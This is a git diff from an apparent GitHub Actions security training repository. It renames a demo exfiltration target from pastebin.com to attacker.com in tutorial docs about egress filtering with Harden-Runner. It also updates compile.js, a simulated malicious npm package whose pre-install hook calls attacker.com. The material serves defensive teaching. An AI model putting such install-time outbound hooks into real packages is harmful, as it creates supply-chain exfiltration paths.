divecode-in
diff --git a/‎README.md‎
Lines changed: 2 additions & 2 deletions b/‎README.md‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎docs/Solutions/RestrictOutboundTraffic.md‎
Lines changed: 6 additions & 6 deletions b/‎docs/Solutions/RestrictOutboundTraffic.md‎
Lines changed: 6 additions & 6 deletions
diff --git a/‎images/Puzzle3.png‎
-129 KB b/‎images/Puzzle3.png‎
-129 KB
diff --git a/‎images/Puzzle4.png‎
105 KB b/‎images/Puzzle4.png‎
105 KB
diff --git a/‎src/malware-simulators/exfiltration-simulator/compile.js‎
Lines changed: 8 additions & 2 deletions b/‎src/malware-simulators/exfiltration-simulator/compile.js‎
Lines changed: 8 additions & 2 deletions
@@ -21,11 +21,11 @@ Lets kick things off with a challenge designed to get your analytical gears turn
 - This workflow uses the [Harden-Runner GitHub Action](https://github.com/step-security/harden-runner), which provides Security Observability and Runtime Enforcement for GitHub Actions workflows.
 - Now, we present you with the puzzle. Check out these [network events monitored during a workflow run](https://app.stepsecurity.io/github/step-security/github-actions-goat/actions/runs/6285441645) of this workflow. Notice anything odd?
 
-**Why is there an outbound call to `pastebin.com` during the workflow run?** Is this expected, or something more nefarious?
+**Why is there an outbound call to `attacker.com` during the workflow run?** Is this expected, or something more nefarious?
 
 > For the answer of the puzzle, check out the first hands-on tutorial on [Filtering Egress Network Traffic](./docs/Solutions/RestrictOutboundTraffic.md) from a GitHub Actions workflow run.
 
- <img src="./images/Puzzle3.png" alt="Puzzle showing outbound call to pastebin.com" >
+ <img src="./images/Puzzle4.png" alt="Puzzle showing outbound call to attacker.com" >
 
 ## Threat Scenarios
 
 
@@ -33,16 +33,16 @@ As we will see next, one of these steps is making an unexpected outbound call, b
 
 5. Click the link and you will see the outbound calls that were made from each of the steps.
 
-You can now see that the `npm install` step is making a call to `pastebin.com`, which is not expected.
+You can now see that the `npm install` step is making a call to `attacker.com`, which is not expected.
 
 ### Answer to the puzzle
 
-There is a [Puzzle in the README](../../README.md#puzzle-time) about a call to `pastebin.com`. To understand why this call is being made:
+There is a [Puzzle in the README](../../README.md#puzzle-time) about a call to `attacker.com`. To understand why this call is being made:
 
 - Check out the `package.json` file of the [exfiltration-demo](../../src/exfiltration-demo/package.json) folder.
 - It has a dependency called `@step-security/malware-simulator`
 - This dependency simulates a malicious package. Its [package.json](../../src/malware-simulators/exfiltration-simulator/package.json) has a `pre-install` step that calls [compile.js](../../src/malware-simulators/exfiltration-simulator/compile.js)
-- The compile.js file makes an outbound call to `pastebin.com`
+- The compile.js file makes an outbound call to `attacker.com`
 - As a result, when `npm install` is run in the workflow, the `pre-install` step of the dependency is run, which makes the outbound call.
 
 ### Network Filtering with Harden-Runner
@@ -53,11 +53,11 @@ Now lets see how to filter traffic to expected destinations and block everything
 
 2. View the workflow [hosted-network-filtering-hr.yml](../../.github/workflows/hosted-network-filtering-hr.yml) file.
 
-3. `step-security/harden-runner` GitHub Action has `egress-policy` set to `block`. Only the destinations that are expected are in the allowed list. `pastebin.com` is not in this list.
+3. `step-security/harden-runner` GitHub Action has `egress-policy` set to `block`. Only the destinations that are expected are in the allowed list. `attacker.com` is not in this list.
 
 4. After the workflow completes, check out the build logs.
 
-5. Click the insights link from the `Harden-Runner` step. You will notice that the call to `pastebin.com` was blocked in this case.
+5. Click the insights link from the `Harden-Runner` step. You will notice that the call to `attacker.com` was blocked in this case.
 
 6. You can also install the [StepSecurity Actions Security GitHub App](https://github.com/apps/stepsecurity-actions-security) to get notified via email or Slack when outbound traffic is blocked.
 
@@ -127,4 +127,4 @@ While there is a secure-by-default policy, to filter traffic to specific destina
 3. Visit the workflow insights for this run here:
    https://app.stepsecurity.io/github/step-security/github-actions-goat/actions/runs/6285439406
 
-   You will notice that the call to `pastebin.com` was blocked in this case.
+   You will notice that the call to `attacker.com` was blocked in this case.
@@ -1,7 +1,12 @@
 const https = require("https");
 
 https
-  .get("https://pastebin.com/", (res) => {
+  .get("https://attacker.com/", (res) => {
+    if (res.statusCode < 200 || res.statusCode >= 300) {
+      console.error("HTTP Error: " + res.statusCode);
+      process.exit(1); // Exit with a failure code on HTTP error status
+    }
+
     let data = "";
 
     res.on("data", (chunk) => {
@@ -13,5 +18,6 @@ https
     });
   })
   .on("error", (err) => {
-    console.log("Error: " + err.message);
+    console.error("Error: " + err.message);
+    process.exit(1); // Exit with a failure code
   });